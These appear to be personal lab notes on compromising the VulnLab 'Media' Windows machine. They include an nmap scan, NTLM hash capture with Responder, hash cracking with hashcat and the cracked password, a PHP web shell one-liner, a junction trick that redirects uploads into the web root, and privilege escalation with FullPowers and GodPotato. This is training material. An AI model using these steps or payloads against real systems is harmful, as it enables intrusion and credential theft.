Media
This is not a writeup, just my notes about VulnLabs machines.
Machine information
Operating System: Microsoft Windows Server 2022 Standard
Chain: False (standalone compromise)
Credentials
Username
Password
Method
Scope
ENOX
1234virus@
NTLM Steal
✅ Valid Usernames
ENOX🔑 Passwords list
1234virus@Information Gathering
# Nmap 7.94SVN scan initiated Tue Apr 8 22:04:48 2025 as: nmap -sS -p- -A --open -T5 -Pn -n -oN ext_media_tcp_allports -vvv 10.10.117.146
22/tcp open tcpwrapped syn-ack ttl 127
80/tcp open tcpwrapped syn-ack ttl 127
3389/tcp open tcpwrapped syn-ack ttl 127Service Enumeration
HTTP
CMS: Umbraco
Programming Language: PHP
Possible Usernames:
Parveen Anand
Diana Petersen
Larry Parker
Foothold
The application included a feature that permitted file uploads, which would then be reviewed by an individual, resulting in the theft of NTLM hashes.
❯ sudo responder -I tun0
[sudo] password for Intrusionz3r0:
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.5.0
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.117.146
[SMB] NTLMv2-SSP Username : MEDIA\enox
[SMB] NTLMv2-SSP Hash : enox::MEDIA:dcdd1c94677eaf7d:38211FCE42CC272CF1741A865C0F8485:010100000000000080171981D4A8DB018C0BB451BE88EBB000000000020008004E0057003300560001001E00570049004E002D0038003800430041004B004B0051005700300050004F0004003400570049004E002D0038003800430041004B004B0051005700300050004F002E004E005700330056002E004C004F00430041004C00030014004E005700330056002E004C004F00430041004C00050014004E005700330056002E004C004F00430041004C000700080080171981D4A8DB0106000400020000000800300030000000000000000000000000300000EB457A611A6C30EF0DD25DA5B42105AB1C044EE2E5D85E08B3D65F70A8D0D93E0A0010000000000000000000000000000000000009001C0063006900660073002F00310030002E0038002E0035002E00340038000000000000000000❯ hashcat -m 5600 enox.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
<SNIF>
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
ENOX::MEDIA:dcdd1c94677eaf7d:38211fce4<SNIF>000000:1234virus@Lateral movement as local service user
During the enumeration the tester found and PHP file that create a folder with the name firstname, lastname and email as md5hash into C:/Windows/Tasks/Uploads/ and store all the uploaded files into it.
<?php
error_reporting(0);
// Your PHP code for handling form submission and file upload goes here.
$uploadDir = 'C:/Windows/Tasks/Uploads/'; // Base upload directory
if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_FILES["fileToUpload"])) {
$firstname = filter_var($_POST["firstname"], FILTER_SANITIZE_STRING);
$lastname = filter_var($_POST["lastname"], FILTER_SANITIZE_STRING);
$email = filter_var($_POST["email"], FILTER_SANITIZE_STRING);
// Create a folder name using the MD5 hash of Firstname + Lastname + Email
$folderName = md5($firstname . $lastname . $email);
// Create the full upload directory path
$targetDir = $uploadDir . $folderName . '/';
// Ensure the directory exists; create it if not
if (!file_exists($targetDir)) {
mkdir($targetDir, 0777, true);
}
// Sanitize the filename to remove unsafe characters
$originalFilename = $_FILES["fileToUpload"]["name"];
$sanitizedFilename = preg_replace("/[^a-zA-Z0-9._]/", "", $originalFilename);
// Build the full path to the target file
$targetFile = $targetDir . $sanitizedFilename;
if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $targetFile)) {
echo "<script>alert('Your application was successfully submitted. Our HR shall review your video and get back to you.');</script>";
// Update the todo.txt file
$todoFile = $uploadDir . 'todo.txt';
$todoContent = "Filename: " . $originalFilename . ", Random Variable: " . $folderName . "\n";
// Append the new line to the file
file_put_contents($todoFile, $todoContent, FILE_APPEND);
} else {
echo "<script>alert('Uh oh, something went wrong... Please submit again');</script>";
}
}
?>The filename is predictible and can be exploitable via Symlinks on Windows to rediret all the files (PHP Web Shell) into C:\xampp\htdocs and obtain a Reverse Shell into the system.
Obtaining the directory name and creating the php web shell.
echo -n "testtesttest@test.com" | md5sum
echo '<?php system($_GET["cmd"]);?>' > shell.phpCreating the Symlinks to point to the web root directory
enox@MEDIA C:\Users>mklink /J "C:/Windows/Tasks/Uploads/44b85c98e94039c8a0a015f6d3a3449e/" "C:\xampp\htdocs"
Junction created for C:/Windows/Tasks/Uploads/44b85c98e94039c8a0a015f6d3a3449e/ <<===>> C:\xampp\htdocsUploading the malicious php web shell
Accessing the php web shell as local service
Privilege Escalation to NT Authority System
Using FullPowers.exe to enable all the default token for service account.
PS C:\Users> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= =================================== ========
SeTcbPrivilege Act as part of the operating system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
PS C:\Users> 
Tool: FullPowers.exe
Abusing SeImpersonatePrivilege to compromise computer.
Binary: GodPotato-NET4.exe
Last updated